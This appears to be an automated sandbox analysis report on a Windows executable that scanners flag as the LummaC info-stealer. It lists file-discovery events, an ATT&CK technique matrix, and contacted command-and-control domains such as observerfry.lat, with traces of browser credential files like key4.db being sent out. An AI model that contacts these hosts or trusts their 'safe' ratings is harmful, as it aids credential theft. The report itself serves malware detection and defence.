                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\NxqDwaYpbp.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.1426043477.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1425952376.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1423605757.0000000000A75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1426155791.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: NxqDwaYpbp.exe PID: 8044, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: NxqDwaYpbp.exe PID: 8044, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Process Injection
                34
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                Query Registry
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Process Injection
                LSASS Memory751
                Security Software Discovery
                Remote Desktop Protocol41
                Data from Local System
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account Manager34
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials223
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                NxqDwaYpbp.exe61%ReversingLabsWin32.Exploit.LummaC
                NxqDwaYpbp.exe100%AviraTR/Crypt.XPACK.Gen
                NxqDwaYpbp.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://observerfry.lat/apite0%Avira URL Cloudsafe
                https://observerfry.lat/d0%Avira URL Cloudsafe
                https://observerfry.lat:443/apip0%Avira URL Cloudsafe
                https://observerfry.lat/apill0%Avira URL Cloudsafe
                https://observerfry.lat/dY?0%Avira URL Cloudsafe
                https://observerfry.lat/S0%Avira URL Cloudsafe
                https://observerfry.lat/b&0%Avira URL Cloudsafe
                https://observerfry.lat/apix0%Avira URL Cloudsafe
                https://observerfry.lat:443/apin.txtPK0%Avira URL Cloudsafe
                https://observerfry.lat:443/api0%Avira URL Cloudsafe
                https://observerfry.lat/api-0%Avira URL Cloudsafe
                https://observerfry.lat/hv0%Avira URL Cloudsafe
                http://crl.microH70%Avira URL Cloudsafe
                https://observerfry.lat/pi:&0%Avira URL Cloudsafe
                https://observerfry.lat:443/api:0%Avira URL Cloudsafe
                https://observerfry.lat/apic0%Avira URL Cloudsafe
                https://observerfry.lat:443/api1tobv5.default-release/key4.dbPK0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                s-part-0035.t-0009.t-msedge.net
                13.107.246.63
                truefalse
                  high
                  observerfry.lat
                  104.21.36.201
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    slipperyloo.latfalse
                      high
                      curverpluch.latfalse
                        high
                        tentabatte.latfalse
                          high
                          manyrestro.latfalse
                            high
                            bashfulacid.latfalse
                              high
                              observerfry.latfalse
                                high
                                wordyfindy.latfalse
                                  high
                                  https://observerfry.lat/apifalse
                                    high
                                    shapestickyr.latfalse
                                      high
                                      talkynicer.latfalse
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabNxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=NxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://observerfry.lat/apillNxqDwaYpbp.exe, 00000000.00000003.1342847515.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1342726085.0000000000A28000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_PrNxqDwaYpbp.exe, 00000000.00000003.1423304374.0000000005404000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=NxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://observerfry.lat/dY?NxqDwaYpbp.exe, 00000000.00000003.1425952376.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1423605757.0000000000A96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://observerfry.lat/dNxqDwaYpbp.exe, 00000000.00000002.1502000071.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1498419671.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1447156583.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1452498320.0000000000A96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpgNxqDwaYpbp.exe, 00000000.00000003.1423304374.0000000005404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://observerfry.lat/b&NxqDwaYpbp.exe, 00000000.00000003.1423605757.0000000000A96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://observerfry.lat/apixNxqDwaYpbp.exe, 00000000.00000003.1447156583.0000000000A83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://observerfry.lat:443/apipNxqDwaYpbp.exe, 00000000.00000003.1342789562.0000000000A03000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700NxqDwaYpbp.exe, 00000000.00000003.1423304374.0000000005404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://observerfry.lat/SNxqDwaYpbp.exe, 00000000.00000003.1342847515.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1342726085.0000000000A28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://x1.c.lencr.org/0NxqDwaYpbp.exe, 00000000.00000003.1398855705.0000000005425000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://x1.i.lencr.org/0NxqDwaYpbp.exe, 00000000.00000003.1398855705.0000000005425000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYiNxqDwaYpbp.exe, 00000000.00000003.1423304374.0000000005404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchNxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://observerfry.lat/apiteNxqDwaYpbp.exe, 00000000.00000003.1447232506.0000000000A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&ctaNxqDwaYpbp.exe, 00000000.00000003.1423304374.0000000005404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://support.mozilla.org/products/firefoxgro.allNxqDwaYpbp.exe, 00000000.00000003.1399808791.0000000005510000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://observerfry.lat:443/apiNxqDwaYpbp.exe, 00000000.00000003.1498727425.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1490170370.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000002.1501552431.0000000000A03000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://observerfry.lat:443/apin.txtPKNxqDwaYpbp.exe, 00000000.00000003.1447393962.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1498727425.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1490170370.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000002.1501552431.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1426243060.0000000000A03000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://observerfry.lat/api-NxqDwaYpbp.exe, 00000000.00000003.1465605080.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1425952376.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1447156583.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1489890391.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1423605757.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1452498320.0000000000A96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://crl.microH7NxqDwaYpbp.exe, 00000000.00000003.1447232506.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1426043477.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1489964702.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1342847515.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1426155791.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1342726085.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1447330697.0000000000A37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoNxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://observerfry.lat/pi:&NxqDwaYpbp.exe, 00000000.00000003.1423605757.0000000000A96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=NxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0NxqDwaYpbp.exe, 00000000.00000003.1398855705.0000000005425000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64NxqDwaYpbp.exe, 00000000.00000003.1423304374.0000000005404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://observerfry.lat/NxqDwaYpbp.exe, NxqDwaYpbp.exe, 00000000.00000002.1502000071.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1465436603.00000000053F7000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000002.1504203509.00000000053FF000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1498419671.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1342789562.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1447099513.00000000053FF000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1342847515.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1465605080.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1398027061.00000000053FC000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1342726085.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1465719103.0000000005404000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1375962675.00000000053FC000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1489890391.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1377126046.00000000053FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://ocsp.rootca1.amazontrust.com0:NxqDwaYpbp.exe, 00000000.00000003.1398855705.0000000005425000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.ecosia.org/newtab/NxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brNxqDwaYpbp.exe, 00000000.00000003.1399808791.0000000005510000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://ac.ecosia.org/autocomplete?q=NxqDwaYpbp.exe, 00000000.00000003.1343570112.000000000542F000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343801651.000000000542C000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1343631492.000000000542C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://observerfry.lat/hvNxqDwaYpbp.exe, 00000000.00000003.1425952376.0000000000A96000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1423605757.0000000000A96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgNxqDwaYpbp.exe, 00000000.00000003.1423304374.0000000005404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?NxqDwaYpbp.exe, 00000000.00000003.1398855705.0000000005425000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://observerfry.lat:443/api:NxqDwaYpbp.exe, 00000000.00000003.1342789562.0000000000A03000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://observerfry.lat:443/api1tobv5.default-release/key4.dbPKNxqDwaYpbp.exe, 00000000.00000003.1447393962.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1498727425.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1490170370.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000002.1501552431.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1426243060.0000000000A03000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://observerfry.lat/apicNxqDwaYpbp.exe, 00000000.00000003.1399044992.00000000053F2000.00000004.00000800.00020000.00000000.sdmp, NxqDwaYpbp.exe, 00000000.00000003.1398698974.00000000053F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
